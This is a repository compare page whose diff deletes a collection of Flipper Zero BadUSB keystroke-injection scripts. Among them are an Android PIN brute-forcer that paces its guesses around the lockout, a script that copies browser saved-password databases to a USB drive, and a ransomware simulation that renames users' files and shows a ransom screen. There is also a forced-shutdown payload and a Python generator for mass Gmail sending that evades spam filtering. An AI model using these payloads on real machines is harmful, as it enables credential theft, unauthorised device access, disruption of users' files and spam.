aaron/flipper-zero-stuff
aaron/flipper-zero-stuff
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: aaron:master
Branches Tags
aaron:master
aaron:main
...
pull from: aaron:main
Branches Tags
aaron:master
aaron:main

No commits in common. "master" and "main" have entirely different histories.
master ... main

11804 changed files with 0 additions and 512457 deletions
Show stats Expand all files Collapse all files

0
README.md Normal file
View file

15
badusb/1_minute_to_sleep.txt
View file

@ -1,15 +0,0 @@
REM Author: Mr.Black (mrblack0 on Discord)
REM Description: Shut down your computer every 1 minute, Windows 10+ only
REM Version: 1.0
REM Category: Execution
DELAY 500
REM Open the Start menu
DELAY 500
REM Type "cmd" and press Enter to open the Command Prompt
STRING cmd
ENTER
DELAY 500
REM Wait to ensure that the Command Prompt is open
REM Type the scheduled shutdown command (1 minute = 60 seconds)
STRING shutdown /s /t 60
ENTER

1061
badusb/265_4_Digit_Pin_BF.txt
View file

File diff suppressed because it is too large Load diff

449
badusb/Android_top65_4digit_pin_bf.txt
View file

@ -1,449 +0,0 @@
REM Android Password Brute Force - 4 digit pin
REM Every 5th attempt the retry waits to work around the 30s timeout Android implements after 5 failed login attempts
REM Uncomment bottom of script for DOB options
REM Average completion time of script is 12m
REM An exhaustive wordlist is not used because A) it is not assumed device has healthy battery B) time/power constraints of healthy battery
REM Tested on Android 4.4
REM Author: defplex.wordpress.com
REM Modified for Flipper Zero by rf-bandit
REM ***USE AT OWN RISK***
REM top 65 common pins
DELAY 500
STRING 1234
ENTER
DELAY 500
STRING 4321
ENTER
DELAY 500
STRING 1111
ENTER
DELAY 500
STRING 2222
ENTER
DELAY 500
STRING 3333
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 4444
ENTER
DELAY 500
STRING 5555
ENTER
DELAY 500
STRING 6666
ENTER
DELAY 500
STRING 7777
ENTER
DELAY 500
STRING 8888
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 9999
ENTER
DELAY 500
STRING 1212
ENTER
DELAY 500
STRING 1004
ENTER
DELAY 500
STRING 2000
ENTER
DELAY 500
STRING 6969
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1122
ENTER
DELAY 500
STRING 1313
ENTER
DELAY 500
STRING 0000
ENTER
DELAY 500
STRING 2001
ENTER
DELAY 500
STRING 1010
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 2580
ENTER
DELAY 500
STRING 1818
ENTER
DELAY 500
STRING 1230
ENTER
DELAY 500
STRING 1984
ENTER
DELAY 500
STRING 1986
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1985
ENTER
DELAY 500
STRING 1000
ENTER
DELAY 500
STRING 1231
ENTER
DELAY 500
STRING 1987
ENTER
DELAY 500
STRING 1999
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 2468
ENTER
DELAY 500
STRING 2002
ENTER
DELAY 500
STRING 2323
ENTER
DELAY 500
STRING 1123
ENTER
DELAY 500
STRING 1233
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1357
ENTER
DELAY 500
STRING 1221
ENTER
DELAY 500
STRING 1324
ENTER
DELAY 500
STRING 1988
ENTER
DELAY 500
STRING 2112
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1004
ENTER
DELAY 500
STRING 2021
ENTER
DELAY 500
STRING 5150
ENTER
DELAY 500
STRING 1024
ENTER
DELAY 500
STRING 1112
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1004
ENTER
DELAY 500
STRING 2021
ENTER
DELAY 500
STRING 5150
ENTER
DELAY 500
STRING 1024
ENTER
DELAY 500
STRING 1112
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1224
ENTER
DELAY 500
STRING 1969
ENTER
DELAY 500
STRING 1225
ENTER
DELAY 500
STRING 1235
ENTER
DELAY 500
STRING 1982
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1001
ENTER
DELAY 500
STRING 7410
ENTER
DELAY 500
STRING 1020
ENTER
DELAY 500
STRING 1223
ENTER
DELAY 500
STRING 1029
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 1515
ENTER
DELAY 500
STRING 1213
ENTER
DELAY 500
STRING 2345
ENTER
DELAY 500
STRING 2424
ENTER
DELAY 500
STRING 2525
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
REM Set dervived from the most commonly appearing digits over an average of 1000 most used pins (0123)
ENTER
DELAY 500
STRING 0123
ENTER
DELAY 500
STRING 1023
ENTER
DELAY 500
STRING 1203
ENTER
DELAY 500
STRING 3210
ENTER
DELAY 500
STRING 2112
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
DELAY 500
STRING 2121
ENTER
DELAY 500
STRING 1320
ENTER
DELAY 500
STRING 3110
ENTER
DELAY 500
STRING 2111
ENTER
DELAY 500
STRING 0321
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
REMIncluding the 5 least used pins to factor in target having some OpSec
ENTER
DELAY 500
STRING 8068
ENTER
DELAY 500
STRING 8093
ENTER
DELAY 500
STRING 6835
ENTER
DELAY 500
STRING 9629
ENTER
DELAY 500
STRING 7637
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
REM Last ditch effort with 4 sets of randomly generated pins
ENTER
DELAY 500
STRING 6364
ENTER
DELAY 500
STRING 6364
ENTER
DELAY 500
STRING 6260
ENTER
DELAY 500
STRING 8647
ENTER
DELAY 500
STRING 0420
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
ENTER
DELAY 500
STRING 8880
ENTER
DELAY 500
STRING 8631
ENTER
DELAY 500
STRING 1121
ENTER
DELAY 500
STRING 2996
ENTER
DELAY 500
STRING 6685
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
ENTER
DELAY 500
STRING 9371
ENTER
DELAY 500
STRING 3417
ENTER
DELAY 500
STRING 9826
ENTER
DELAY 500
STRING 2621
ENTER
DELAY 500
STRING 8431
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
ENTER
DELAY 500
STRING 1185
ENTER
DELAY 500
STRING 2281
ENTER
DELAY 500
STRING 5519
ENTER
DELAY 500
STRING 8657
ENTER
DELAY 500
STRING 6435
ENTER
DELAY 500
STRING x
ENTER
DELAY 31000
ENTER
REM If DOB for target is known uncomment and replace xxxx with MMDD, DDMM or YYYY
REM Left at end of script on purpose to keep everything in groups of 5
REM DELAY 500
REM STRING xxxx
ENTER
REM DELAY 500
REM STRING xxxx
ENTER
REM DELAY 500
REM STRING xxxx
ENTER
REM DELAY 500
REM STRING x

13
badusb/Awesome_Flipper_OSX.txt
View file

@ -1,13 +0,0 @@
REM Title: Awesome Flippers
REM Author: xepexted
REM Based off work from: Jeffrey Koopman | JKCTech
REM Description: Opens default browser and redirects you to Awesome Flippers Github
REM Target: macOS 11.0+
REM
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING open 'https://github.com/djsime1/awesome-flipperzero'; exit
ENTER

42
badusb/BadUSB-MarkCyber/Emails/EmailSender.txt
View file

@ -1,42 +0,0 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 500
STRING chrome
ENTER
DELAY 1000
STRING https://mail.google.com/mail/u/0/#inbox?compose=new
ENTER
DELAY 5000
DELAY 1000
STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
DELAY 500
TAB
TAB
STRING {YOUR SUBJECT NAME}
TAB
STRING Hi {THEIR NAME}
ENTER
ENTER
STRING {CONTENTS OF THE EMAIL}
ENTER
ENTER
STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
ENTER
ENTER
STRING Respectfully,
ENTER
ENTER
STRING {YOUR NAME}
ENTER
CTRL ENTER
DELAY 5000
DELAY 1000
ALT F4
REM check out github.com/markcyber for more scripts

101
badusb/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
View file

@ -1,101 +0,0 @@
#######################################################################################################################################
#######################################################################################################################################
################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
################# This script will then make a badusb script using the name + email of each person ####################
################# There are various subject options that will be chosen from, to minimize "spam" ####################
################# Change the signature to your name, and put subject options that fit your email ####################
################# Lastly, of course make sure to change the contents of the email to what you want ####################
#######################################################################################################################################
#######################################################################################################################################
import pandas as pd
import random
# Load the Excel file, make sure it has the same name (or change the name in this script)
file_path = 'NameAndEmails.xlsx'
data_df = pd.read_excel(file_path)
# Your excel should have 2 columns. Names, and Emails.
data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
data_cleaned_df.columns = ['Name', 'Email']
# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
subject_options = [
"Placeholder for subject option 1",
"Placeholder for subject option 2",
"Placeholder for subject option 3",
"Placeholder for subject option 4",
"Placeholder for subject option 5",
"Placeholder for subject option 6",
"Placeholder for subject option 7"
]
# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
# Just modify the actual email body and sender name to fit your needs
email_body_template = """
Hi {name},
Placeholder for email body.
Warm Regards,
Sender Name
"""
# Function to generate BadUSB script
def generate_badusb_script_with_placeholders_single_file(data_df):
script_template = [
"DELAY 1000",
"GUI r",
"DELAY 500",
"STRING chrome",
"ENTER",
"DELAY 1000",
"STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
"ENTER",
"DELAY 5000"
]
scripts = script_template
for index, row in data_df.iterrows():
name = row['Name']
email = row['Email']
subject = random.choice(subject_options)
random_delay = random.randint(10000, 25000)
email_body_lines = email_body_template.format(name=name).strip().split('\n')
email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
email_script = [
"DELAY 1000",
f"STRING {email}",
"DELAY 500",
"TAB",
"TAB",
f"STRING {subject}",
"TAB"
] + email_body_lines + [
"ENTER",
"CONTROL ENTER",
"DELAY 5000",
f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
"ALT F4"
]
scripts += email_script
return "\n".join(scripts)
# Generate the BadUSB script with placeholders and proper send command in a single file
final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
# Save the script to a file
final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
with open(final_script_file_path, 'w') as file:
file.write(final_script_with_placeholders)
print(f"Script saved to {final_script_file_path}")
#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts

54
badusb/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
View file

@ -1,54 +0,0 @@
REM ##################################################################################################################
REM ############## This script was created by github.com/markcyber ##############
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
REM ############## The extracted data will require decryption ##############
REM ##################################################################################################################
REM Open PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff

630
badusb/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt
View file

@ -1,630 +0,0 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000
REM check out github.com/markcyber for more badusb/pen testing scripts and tools

91
badusb/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
View file

@ -1,91 +0,0 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 1000
REM opens powershell (this is for windows machines)
STRING powershell
ENTER
DELAY 3000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 500
ENTER
DELAY 500
STRING )
DELAY 500
ENTER
DELAY 500
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 500
ENTER
DELAY 500
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 500
ENTER
DELAY 500
REM Get all files in the path and rename them
STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 2000
REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework
DELAY 500
ENTER
DELAY 500
STRING $Window = New-Object System.Windows.Window
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowStartupLocation = 'CenterScreen'
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowState = 'Maximized'
DELAY 500
ENTER
DELAY 500
STRING $Window.Topmost = $true
DELAY 500
ENTER
DELAY 500
STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
DELAY 500
ENTER
DELAY 500
